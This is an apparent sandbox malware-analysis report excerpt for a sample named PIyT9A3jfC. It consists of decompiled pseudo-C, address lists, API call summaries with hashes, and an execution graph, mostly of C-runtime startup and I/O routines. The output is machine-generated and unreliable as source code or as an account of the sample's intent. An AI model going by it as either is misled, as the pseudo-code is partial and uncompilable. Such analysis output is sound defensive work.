                                                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                                                      				_t4 = _t24 + 1; // 0x2bc0e271
                                                                                                                                                                                                                                                                      				asm("sbb eax, eax");
                                                                                                                                                                                                                                                                      				return  ~_t4 & _t24;
                                                                                                                                                                                                                                                                      			}










                                                                                                                                                                                                                                                                      0x0118a7b5
                                                                                                                                                                                                                                                                      0x0118a7b9
                                                                                                                                                                                                                                                                      0x0118a7c0
                                                                                                                                                                                                                                                                      0x0118a7c4
                                                                                                                                                                                                                                                                      0x0118a7d2
                                                                                                                                                                                                                                                                      0x0118a7e8
                                                                                                                                                                                                                                                                      0x0118a7ec
                                                                                                                                                                                                                                                                      0x0118a815
                                                                                                                                                                                                                                                                      0x0118a817
                                                                                                                                                                                                                                                                      0x0118a81b
                                                                                                                                                                                                                                                                      0x0118a81e
                                                                                                                                                                                                                                                                      0x0118a81e
                                                                                                                                                                                                                                                                      0x0118a824
                                                                                                                                                                                                                                                                      0x0118a826
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x0118a827
                                                                                                                                                                                                                                                                      0x0118a7ee
                                                                                                                                                                                                                                                                      0x0118a7f7
                                                                                                                                                                                                                                                                      0x0118a806
                                                                                                                                                                                                                                                                      0x0118a7f9
                                                                                                                                                                                                                                                                      0x0118a7fc
                                                                                                                                                                                                                                                                      0x0118a802
                                                                                                                                                                                                                                                                      0x0118a802
                                                                                                                                                                                                                                                                      0x0118a80a
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x0118a80c
                                                                                                                                                                                                                                                                      0x0118a80f
                                                                                                                                                                                                                                                                      0x0118a811
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x0118a811
                                                                                                                                                                                                                                                                      0x0118a80a
                                                                                                                                                                                                                                                                      0x0118a7c6
                                                                                                                                                                                                                                                                      0x0118a7cb
                                                                                                                                                                                                                                                                      0x00000000

                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00000000,00000000,?,0118A757,?,00000000,00000000,00000000,?,0118A954,00000006,FlsSetValue), ref: 0118A7E2
                                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,0118A757,?,00000000,00000000,00000000,?,0118A954,00000006,FlsSetValue,011D71D0,FlsSetValue,00000000,00000364,?,01189D02), ref: 0118A7EE
                                                                                                                                                                                                                                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0118A757,?,00000000,00000000,00000000,?,0118A954,00000006,FlsSetValue,011D71D0,FlsSetValue,00000000), ref: 0118A7FC
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.815380758.0000000001181000.00000020.00000001.01000000.00000003.sdmp, Offset: 01180000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.815317551.0000000001180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.815648726.0000000001199000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.816245564.00000000011DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.817184209.000000000121D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.817258824.000000000121F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_1180000_PIyT9A3jfC.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 3177248105-0
                                                                                                                                                                                                                                                                      • Opcode ID: f8fb1a7ab3a3ef995d956946a0dc77958d37fd94cf4c70ec65cd73296e6d684c
                                                                                                                                                                                                                                                                      • Instruction ID: 088c7d7feb3e4bf557f31b2eab01ad17a4852f45d7f65dedae9286699b85215f
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f8fb1a7ab3a3ef995d956946a0dc77958d37fd94cf4c70ec65cd73296e6d684c
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D0014732622236AFC73D596CBC089663B9CEF0A6A2B258235FA26D3144D720D441CBF0
                                                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • ___BuildCatchObject.LIBVCRUNTIME ref: 0118F89A
                                                                                                                                                                                                                                                                        • Part of subcall function 0118FEDF: ___AdjustPointer.LIBCMT ref: 0118FF29
                                                                                                                                                                                                                                                                      • _UnwindNestedFrames.LIBCMT ref: 0118F8B1
                                                                                                                                                                                                                                                                      • ___FrameUnwindToState.LIBVCRUNTIME ref: 0118F8C3
                                                                                                                                                                                                                                                                      • CallCatchBlock.LIBVCRUNTIME ref: 0118F8E7
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.815380758.0000000001181000.00000020.00000001.01000000.00000003.sdmp, Offset: 01180000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.815317551.0000000001180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.815648726.0000000001199000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.816245564.00000000011DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.817184209.000000000121D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.817258824.000000000121F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_1180000_PIyT9A3jfC.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 2633735394-0
                                                                                                                                                                                                                                                                      • Opcode ID: a0c907a298b97105730ea91cdf1af8e9e208b30165c122e71212370a16017045
                                                                                                                                                                                                                                                                      • Instruction ID: ff54457b25b5d9f55e82da900912895fc7c1ff5a1ced226ae0ecf157bbda7213
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a0c907a298b97105730ea91cdf1af8e9e208b30165c122e71212370a16017045
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3601D73200010ABBDF166F59CC44EDA3BAAEF5A758F158524FA1866120D772E862DFA1
                                                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                                                                                                      			E0118F376() {
                                                                                                                                                                                                                                                                      				void* _t4;
                                                                                                                                                                                                                                                                      				void* _t8;
                                                                                                                                                                                                                                                                      
                                                                                                                                                                                                                                                                      				E011907C7();
                                                                                                                                                                                                                                                                      				E0119075B();
                                                                                                                                                                                                                                                                      				if(E0119049E() != 0) {
                                                                                                                                                                                                                                                                      					_t4 = E0118F4B6(_t8, __eflags);
                                                                                                                                                                                                                                                                      					__eflags = _t4;
                                                                                                                                                                                                                                                                      					if(_t4 != 0) {
                                                                                                                                                                                                                                                                      						return 1;
                                                                                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                                                                                      						E011904DA();
                                                                                                                                                                                                                                                                      						goto L1;
                                                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                                                                                      					L1:
                                                                                                                                                                                                                                                                      					return 0;
                                                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                                                      			}





                                                                                                                                                                                                                                                                      0x0118f376
                                                                                                                                                                                                                                                                      0x0118f37b
                                                                                                                                                                                                                                                                      0x0118f387
                                                                                                                                                                                                                                                                      0x0118f38c
                                                                                                                                                                                                                                                                      0x0118f391
                                                                                                                                                                                                                                                                      0x0118f393
                                                                                                                                                                                                                                                                      0x0118f39e
                                                                                                                                                                                                                                                                      0x0118f395
                                                                                                                                                                                                                                                                      0x0118f395
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x0118f395
                                                                                                                                                                                                                                                                      0x0118f389
                                                                                                                                                                                                                                                                      0x0118f389
                                                                                                                                                                                                                                                                      0x0118f38b
                                                                                                                                                                                                                                                                      0x0118f38b

                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 0118F376
                                                                                                                                                                                                                                                                      • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 0118F37B
                                                                                                                                                                                                                                                                      • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 0118F380
                                                                                                                                                                                                                                                                        • Part of subcall function 0119049E: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 011904AF
                                                                                                                                                                                                                                                                      • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 0118F395
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.815380758.0000000001181000.00000020.00000001.01000000.00000003.sdmp, Offset: 01180000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.815317551.0000000001180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.815648726.0000000001199000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.816245564.00000000011DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.817184209.000000000121D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.817258824.000000000121F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_1180000_PIyT9A3jfC.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 1761009282-0
                                                                                                                                                                                                                                                                      • Opcode ID: d9d358f762020a3697c42513d329f3b7714901d0df1c8398228c41b5068d958c
                                                                                                                                                                                                                                                                      • Instruction ID: 5905024323dcbe4f58ae7d1ba4b46afc280c5b8b7d7186fd20592ae1a7877a3b
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d9d358f762020a3697c42513d329f3b7714901d0df1c8398228c41b5068d958c
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 25C04C15119643D01F6D3AB521101AD23090E7E9DCF8194D1ACB097543DF0A004B9D73
                                                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                      Execution Graph

                                                                                                                                                                                                                                                                      Execution Coverage:4.7%
                                                                                                                                                                                                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                                                      Signature Coverage:0%
                                                                                                                                                                                                                                                                      Total number of Nodes:1272
                                                                                                                                                                                                                                                                      Total number of Limit Nodes:24
                                                                                                                                                                                                                                                                      execution_graph 9834 fbc87a 9837 fbb4ba 9834->9837 9838 fbb4c3 9837->9838 9839 fbb4cc 9837->9839 9838->9839 9840 fbb3b9 61 API calls 9838->9840 9840->9839 9057 fc28f8 9067 fc2f33 9057->9067 9061 fc2905 9080 fc30b4 9061->9080 9064 fc292f 9065 fba6da _free 20 API calls 9064->9065 9066 fc293a 9065->9066 9084 fc2f3c 9067->9084 9069 fc2900 9070 fc3014 9069->9070 9071 fc3020 ___scrt_is_nonwritable_in_current_image 9070->9071 9104 fbaf81 EnterCriticalSection 9071->9104 9073 fc3096 9118 fc30ab 9073->9118 9075 fc302b 9075->9073 9077 fc306a DeleteCriticalSection 9075->9077 9105 fc3e2c 9075->9105 9076 fc30a2 ___scrt_is_nonwritable_in_current_image 9076->9061 9079 fba6da _free 20 API calls 9077->9079 9079->9075 9081 fc2914 DeleteCriticalSection 9080->9081 9082 fc30ca 9080->9082 9081->9061 9081->9064 9082->9081 9083 fba6da _free 20 API calls 9082->9083 9083->9081 9085 fc2f48 ___scrt_is_nonwritable_in_current_image 9084->9085 9094 fbaf81 EnterCriticalSection 9085->9094 9087 fc2feb 9099 fc300b 9087->9099 9090 fc2f57 9090->9087 9093 fc2eec 75 API calls 9090->9093 9095 fc2944 EnterCriticalSection 9090->9095 9096 fc2fe1 9090->9096 9092 fc2ff7 ___scrt_is_nonwritable_in_current_image 9092->9069 9093->9090 9094->9090 9095->9090 9102 fc2958 LeaveCriticalSection 9096->9102 9098 fc2fe9 9098->9090 9103 fbafc9 LeaveCriticalSection 9099->9103 9101 fc3012 9101->9092 9102->9098 9103->9101 9104->9075 9106 fc3e38 ___scrt_is_nonwritable_in_current_image 9105->9106 9107 fc3e5e 9106->9107 9108 fc3e49 9106->9108 9117 fc3e59 ___scrt_is_nonwritable_in_current_image 9107->9117 9121 fc2944 EnterCriticalSection 9107->9121 9109 fb9826 __dosmaperr 20 API calls 9108->9109 9111 fc3e4e 9109->9111 9113 fb976a ___std_exception_copy 26 API calls 9111->9113 9112 fc3e7a 9122 fc3db6 9112->9122 9113->9117 9115 fc3e85 9138 fc3ea2 9115->9138 9117->9075 9386 fbafc9 LeaveCriticalSection 9118->9386 9120 fc30b2 9120->9076 9121->9112 9123 fc3dd8 9122->9123 9124 fc3dc3 9122->9124 9131 fc3dd3 9123->9131 9141 fc2e86 9123->9141 9125 fb9826 __dosmaperr 20 API calls 9124->9125 9127 fc3dc8 9125->9127 9129 fb976a ___std_exception_copy 26 API calls 9127->9129 9129->9131 9130 fc30b4 20 API calls 9132 fc3df4 9130->9132 9131->9115 9147 fc280a 9132->9147 9134 fc3dfa 9154 fc42ca 9134->9154 9137 fba6da _free 20 API calls 9137->9131 9385 fc2958 LeaveCriticalSection 9138->9385 9140 fc3eaa 9140->9117 9142 fc2e9e 9141->9142 9146 fc2e9a 9141->9146 9143 fc280a 26 API calls 9142->9143 9142->9146 9144 fc2ebe 9143->9144 9169 fc37b1 9144->9169 9146->9130 9148 fc282b 9147->9148 9149 fc2816 9147->9149 9148->9134 9150 fb9826 __dosmaperr 20 API calls 9149->9150 9151 fc281b 9150->9151 9152 fb976a ___std_exception_copy 26 API calls 9151->9152 9153 fc2826 9152->9153 9153->9134 9155 fc42ee 9154->9155 9156 fc42d9 9154->9156 9157 fc4329 9155->9157 9161 fc4315 9155->9161 9158 fb9813 __dosmaperr 20 API calls 9156->9158 9159 fb9813 __dosmaperr 20 API calls 9157->9159 9160 fc42de 9158->9160 9162 fc432e 9159->9162 9163 fb9826 __dosmaperr 20 API calls 9160->9163 9342 fc42a2 9161->9342 9165 fb9826 __dosmaperr 20 API calls 9162->9165 9166 fc3e00 9163->9166 9167 fc4336 9165->9167 9166->9131 9166->9137 9168 fb976a ___std_exception_copy 26 API calls 9167->9168 9168->9166 9170 fc37bd ___scrt_is_nonwritable_in_current_image 9169->9170 9171 fc37c5 9170->9171 9174 fc37dd 9170->9174 9194 fb9813 9171->9194 9173 fc387b 9176 fb9813 __dosmaperr 20 API calls 9173->9176 9174->9173 9179 fc3812 9174->9179 9178 fc3880 9176->9178 9177 fb9826 __dosmaperr 20 API calls 9187 fc37d2 ___scrt_is_nonwritable_in_current_image 9177->9187 9180 fb9826 __dosmaperr 20 API calls 9178->9180 9197 fc1eb0 EnterCriticalSection 9179->9197 9182 fc3888 9180->9182 9184 fb976a ___std_exception_copy 26 API calls 9182->9184 9183 fc3818 9185 fc3849 9183->9185 9186 fc3834 9183->9186 9184->9187 9198 fc389c 9185->9198 9189 fb9826 __dosmaperr 20 API calls 9186->9189 9187->9146 9191 fc3839 9189->9191 9190 fc3844 9249 fc3873 9190->9249 9192 fb9813 __dosmaperr 20 API calls 9191->9192 9192->9190 9195 fb9cb4 __dosmaperr 20 API calls 9194->9195 9196 fb9818 9195->9196 9196->9177 9197->9183 9199 fc38ca 9198->9199 9236 fc38c3 9198->9236 9200 fc38ed 9199->9200 9201 fc38ce 9199->9201 9205 fc393e 9200->9205 9206 fc3921 9200->9206 9202 fb9813 __dosmaperr 20 API calls 9201->9202 9204 fc38d3 9202->9204 9203 fbdc5f _ValidateLocalCookies 5 API calls 9207 fc3aa4 9203->9207 9208 fb9826 __dosmaperr 20 API calls 9204->9208 9209 fc3954 9205->9209 9252 fc3d9b 9205->9252 9210 fb9813 __dosmaperr 20 API calls 9206->9210 9207->9190 9211 fc38da 9208->9211 9255 fc3441 9209->9255 9214 fc3926 9210->9214 9215 fb976a ___std_exception_copy 26 API calls 9211->9215 9217 fb9826 __dosmaperr 20 API calls 9214->9217 9215->9236 9218 fc392e 9217->9218 9221 fb976a ___std_exception_copy 26 API calls 9218->9221 9219 fc399b 9222 fc39af 9219->9222 9223 fc39f5 WriteFile 9219->9223 9220 fc3962 9224 fc3988 9220->9224 9225 fc3966 9220->9225 9221->9236 9228 fc39e5 9222->9228 9229 fc39b7 9222->9229 9226 fc3a18 GetLastError 9223->9226 9231 fc397e 9223->9231 9267 fc3221 GetConsoleCP 9224->9267 9230 fc3a5c 9225->9230 9262 fc33d4 9225->9262 9226->9231 9293 fc34b7 9228->9293 9232 fc39bc 9229->9232 9233 fc39d5 9229->9233 9230->9236 9237 fb9826 __dosmaperr 20 API calls 9230->9237 9231->9230 9231->9236 9240 fc3a38 9231->9240 9232->9230 9278 fc3596 9232->9278 9285 fc3684 9233->9285 9236->9203 9239 fc3a81 9237->9239 9242 fb9813 __dosmaperr 20 API calls 9239->9242 9243 fc3a3f 9240->9243 9244 fc3a53 9240->9244 9242->9236 9245 fb9826 __dosmaperr 20 API calls 9243->9245 9300 fb97f0 9244->9300 9247 fc3a44 9245->9247 9248 fb9813 __dosmaperr 20 API calls 9247->9248 9248->9236 9341 fc1ed3 LeaveCriticalSection 9249->9341 9251 fc3879 9251->9187 9305 fc3d1d 9252->9305 9327 fc2e30 9255->9327 9257 fc3451 9258 fb9c30 _abort 47 API calls 9257->9258 9259 fc3456 9257->9259 9260 fc3479 9258->9260 9259->9219 9259->9220 9260->9259 9261 fc3497 GetConsoleMode 9260->9261 9261->9259 9265 fc342e 9262->9265 9266 fc33f9 9262->9266 9263 fc3f11 WriteConsoleW CreateFileW 9263->9266 9264 fc3430 GetLastError 9264->9265 9265->9231 9266->9263 9266->9264 9266->9265 9268 fc3284 9267->9268 9277 fc3396 9267->9277 9272 fc330a WideCharToMultiByte 9268->9272 9274 fc27f0 49 API calls __fassign 9268->9274 9276 fc3361 WriteFile 9268->9276 9268->9277 9336 fb9839 9268->9336 9269 fbdc5f _ValidateLocalCookies 5 API calls 9271 fc33d0 9269->9271 9271->9231 9273 fc3330 WriteFile 9272->9273 9272->9277 9273->9268 9275 fc33b9 GetLastError 9273->9275 9274->9268 9275->9277 9276->9268 9276->9275 9277->9269 9279 fc35a5 9278->9279 9280 fc3667 9279->9280 9282 fc3623 WriteFile 9279->9282 9281 fbdc5f _ValidateLocalCookies 5 API calls 9280->9281 9284 fc3680 9281->9284 9282->9279 9283 fc3669 GetLastError 9282->9283 9283->9280 9284->9231 9292 fc3693 9285->9292 9286 fc379e 9287 fbdc5f _ValidateLocalCookies 5 API calls 9286->9287 9288 fc37ad 9287->9288 9288->9231 9289 fc3715 WideCharToMultiByte 9290 fc374a WriteFile 9289->9290 9291 fc3796 GetLastError 9289->9291 9290->9291 9290->9292 9291->9286 9292->9286 9292->9289 9292->9290 9298 fc34c6 9293->9298 9294 fc3579 9295 fbdc5f _ValidateLocalCookies 5 API calls 9294->9295 9297 fc3592 9295->9297 9296 fc3538 WriteFile 9296->9298 9299 fc357b GetLastError 9296->9299 9297->9231 9298->9294 9298->9296 9299->9294 9301 fb9813 __dosmaperr 20 API calls 9300->9301 9302 fb97fb __dosmaperr 9301->9302 9303 fb9826 __dosmaperr 20 API calls 9302->9303 9304 fb980e 9303->9304 9304->9236 9314 fc1f87 9305->9314 9307 fc3d2f 9308 fc3d48 SetFilePointerEx 9307->9308 9309 fc3d37 9307->9309 9311 fc3d3c 9308->9311 9312 fc3d60 GetLastError 9308->9312 9310 fb9826 __dosmaperr 20 API calls 9309->9310 9310->9311 9311->9209 9313 fb97f0 __dosmaperr 20 API calls 9312->9313 9313->9311 9315 fc1f94 9314->9315 9317 fc1fa9 9314->9317 9316 fb9813 __dosmaperr 20 API calls 9315->9316 9318 fc1f99 9316->9318 9319 fb9813 __dosmaperr 20 API calls 9317->9319 9321 fc1fce 9317->9321 9320 fb9826 __dosmaperr 20 API calls 9318->9320 9322 fc1fd9 9319->9322 9323 fc1fa1 9320->9323 9321->9307 9324 fb9826 __dosmaperr 20 API calls 9322->9324 9323->9307 9325 fc1fe1 9324->9325 9326 fb976a ___std_exception_copy 26 API calls 9325->9326 9326->9323 9328 fc2e3d 9327->9328 9329 fc2e4a 9327->9329 9330 fb9826 __dosmaperr 20 API calls 9328->9330 9331 fc2e56 9329->9331 9332 fb9826 __dosmaperr 20 API calls 9329->9332 9333 fc2e42 9330->9333 9331->9257 9334 fc2e77 9332->9334 9333->9257 9335 fb976a ___std_exception_copy 26 API calls 9334->9335 9335->9333 9337 fb9c30 _abort 47 API calls 9336->9337 9338 fb9844 9337->9338 9339 fb9d7f __fassign 47 API calls 9338->9339 9340 fb9854 9339->9340 9340->9268 9341->9251 9345 fc4220 9342->9345 9344 fc42c6 9344->9166 9346 fc422c ___scrt_is_nonwritable_in_current_image 9345->9346 9356 fc1eb0 EnterCriticalSection 9346->9356 9348 fc423a 9349 fc426c 9348->9349 9350 fc4261 9348->9350 9352 fb9826 __dosmaperr 20 API calls 9349->9352 9357 fc4349 9350->9357 9353 fc4267 9352->9353 9372 fc4296 9353->9372 9355 fc4289 ___scrt_is_nonwritable_in_current_image 9355->9344 9356->9348 9358 fc1f87 26 API calls 9357->9358 9361 fc4359 9358->9361 9359 fc435f 9375 fc1ef6 9359->9375 9361->9359 9363 fc1f87 26 API calls 9361->9363 9371 fc4391 9361->9371 9366 fc4388 9363->9366 9364 fc1f87 26 API calls 9365 fc439d CloseHandle 9364->9365 9365->9359 9367 fc43a9 GetLastError 9365->9367 9370 fc1f87 26 API calls 9366->9370 9367->9359 9368 fb97f0 __dosmaperr 20 API calls 9369 fc43d9 9368->9369 9369->9353 9370->9371 9371->9359 9371->9364 9384 fc1ed3 LeaveCriticalSection 9372->9384 9374 fc42a0 9374->9355 9376 fc1f6c 9375->9376 9377 fc1f05 9375->9377 9378 fb9826 __dosmaperr 20 API calls 9376->9378 9377->9376 9383 fc1f2f 9377->9383 9379 fc1f71 9378->9379 9380 fb9813 __dosmaperr 20 API calls 9379->9380 9381 fc1f5c 9380->9381 9381->9368 9381->9369 9382 fc1f56 SetStdHandle 9382->9381 9383->9381 9383->9382 9384->9374 9385->9140 9386->9120 9472 fb9def 9473 fb9dfb ___scrt_is_nonwritable_in_current_image 9472->9473 9474 fb9e32 ___scrt_is_nonwritable_in_current_image 9473->9474 9480 fbaf81 EnterCriticalSection 9473->9480 9476 fb9e0f 9477 fbaef0 __fassign 20 API calls 9476->9477 9478 fb9e1f 9477->9478 9481 fb9e38 9478->9481 9480->9476 9484 fbafc9 LeaveCriticalSection 9481->9484 9483 fb9e3f 9483->9474 9484->9483 8691 fbdaed 8692 fbdaf9 ___scrt_is_nonwritable_in_current_image 8691->8692 8716 fbe373 8692->8716 8694 fbdb00 8696 fbdb29 8694->8696 8756 fbdd8f IsProcessorFeaturePresent 8694->8756 8704 fbdb68 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 8696->8704 8727 fbd336 8696->8727 8699 fbd2da _abort 5 API calls 8699->8704 8700 fbdb48 ___scrt_is_nonwritable_in_current_image 8701 fbdbc8 8731 fbdeaa 8701->8731 8703 fbdbce 8735 fb1f80 8703->8735 8704->8701 8760 fbc2fb 8704->8760 8717 fbe37c 8716->8717 8767 fbe0be IsProcessorFeaturePresent 8717->8767 8721 fbe38d 8722 fbe391 8721->8722 8778 fc16b7 8721->8778 8722->8694 8725 fbe3a8 8725->8694 8729 fbd34d 8727->8729 8728 fbdc5f _ValidateLocalCookies 5 API calls 8730 fbd377 8728->8730 8729->8728 8730->8699 8730->8700 8896 fbf070 8731->8896 8734 fbded0 8734->8703 8736 fb1fda 8735->8736 8737 fb2202 8735->8737 8738 fb1feb 8736->8738 8739 fb2117 8736->8739 8740 fb2428 CloseHandle GetCurrentProcessId 8737->8740 8741 fb2213 8737->8741 8922 fb3690 8738->8922 8739->8737 8747 fb2165 GetModuleHandleA 8739->8747 8940 fc5ff0 8740->8940 8912 fc55c0 8741->8912 8745 fb227e 8916 fc7440 8745->8916 8746 fb207d 8898 fb3e70 8746->8898 8934 fc8570 8747->8934 8748 fb24ab MultiByteToWideChar 8752 fb2575 ExitProcess 8748->8752 8753 fb20e9 8753->8737 8755 fb23f0 8755->8752 8757 fbdda5 ___scrt_get_show_window_mode 8756->8757 8758 fbde4d IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 8757->8758 8759 fbde97 8758->8759 8759->8694 8761 fbc323 try_get_function 8760->8761 8762 fbd762 _abort 8760->8762 8761->8701 8763 fb9c30 _abort 47 API calls 8762->8763 8766 fbd773 8763->8766 8764 fba63a _abort 47 API calls 8765 fbd79d 8764->8765 8766->8764 8768 fbe0e4 8767->8768 8769 fbf376 8768->8769 8770 fbf37b ___vcrt_initialize_pure_virtual_call_handler ___vcrt_initialize_winapi_thunks 8769->8770 8789 fc049e 8770->8789 8773 fbf389 8773->8721 8775 fbf391 8776 fbf39c 8775->8776 8803 fc04da 8775->8803 8776->8721 8826 fc21e0 8778->8826 8781 fbf39f 8782 fbf3b9 8781->8782 8783 fbf3a8 8781->8783 8782->8722 8784 fbf4e9 ___vcrt_uninitialize_ptd 6 API calls 8783->8784 8785 fbf3ad 8784->8785 8786 fc04da ___vcrt_uninitialize_locks DeleteCriticalSection 8785->8786 8787 fbf3b2 8786->8787 8892 fc0795 8787->8892 8791 fc04a7 8789->8791 8792 fc04d0 8791->8792 8793 fbf385 8791->8793 8807 fc0715 8791->8807 8794 fc04da ___vcrt_uninitialize_locks DeleteCriticalSection 8792->8794 8793->8773 8795 fbf4b6 8793->8795 8794->8793 8812 fc062a 8795->8812 8797 fbf4c0 8798 fbf4cb 8797->8798 8799 fc06d8 ___vcrt_FlsSetValue 6 API calls 8797->8799 8798->8775 8800 fbf4d9 8799->8800 8801 fbf4e6 8800->8801 8817 fbf4e9 8800->8817 8801->8775 8804 fc0504 8803->8804 8805 fc04e5 8803->8805 8804->8773 8806 fc04ef DeleteCriticalSection 8805->8806 8806->8804 8806->8806 8808 fc0509 try_get_function 5 API calls 8807->8808 8809 fc072f 8808->8809 8810 fc074c InitializeCriticalSectionAndSpinCount 8809->8810 8811 fc0738 8809->8811 8810->8811 8811->8791 8813 fc0509 try_get_function 5 API calls 8812->8813 8814 fc0644 8813->8814 8815 fc065c TlsAlloc 8814->8815 8816 fc064d 8814->8816 8816->8797 8818 fbf4f3 8817->8818 8819 fbf4f9 8817->8819 8821 fc0664 8818->8821 8819->8798 8822 fc0509 try_get_function 5 API calls 8821->8822 8823 fc067e 8822->8823 8824 fc0695 TlsFree 8823->8824 8825 fc068a 8823->8825 8824->8825 8825->8819 8827 fc21fd 8826->8827 8830 fc21f9 8826->8830 8827->8830 8832 fc215e 8827->8832 8828 fbdc5f _ValidateLocalCookies 5 API calls 8829 fbe39a 8828->8829 8829->8725 8829->8781 8830->8828 8833 fc216a ___scrt_is_nonwritable_in_current_image 8832->8833 8844 fbaf81 EnterCriticalSection 8833->8844 8835 fc2171 8845 fc1e18 8835->8845 8837 fc2180 8843 fc218f 8837->8843 8858 fc1ff2 GetStartupInfoW 8837->8858 8841 fc21a0 ___scrt_is_nonwritable_in_current_image 8841->8827 8869 fc21ab 8843->8869 8844->8835 8846 fc1e24 ___scrt_is_nonwritable_in_current_image 8845->8846 8847 fc1e48 8846->8847 8848 fc1e31 8846->8848 8872 fbaf81 EnterCriticalSection 8847->8872 8850 fb9826 __dosmaperr 20 API calls 8848->8850 8851 fc1e36 8850->8851 8852 fb976a ___std_exception_copy 26 API calls 8851->8852 8854 fc1e40 ___scrt_is_nonwritable_in_current_image 8852->8854 8853 fc1e80 8880 fc1ea7 8853->8880 8854->8837 8855 fc1e54 8855->8853 8873 fc1d69 8855->8873 8859 fc200f 8858->8859 8861 fc20a1 8858->8861 8860 fc1e18 27 API calls 8859->8860 8859->8861 8862 fc2038 8860->8862 8864 fc20a8 8861->8864 8862->8861 8863 fc2066 GetFileType 8862->8863 8863->8862 8865 fc20af 8864->8865 8866 fc20f2 GetStdHandle 8865->8866 8867 fc215a 8865->8867 8868 fc2105 GetFileType 8865->8868 8866->8865 8867->8843 8868->8865 8891 fbafc9 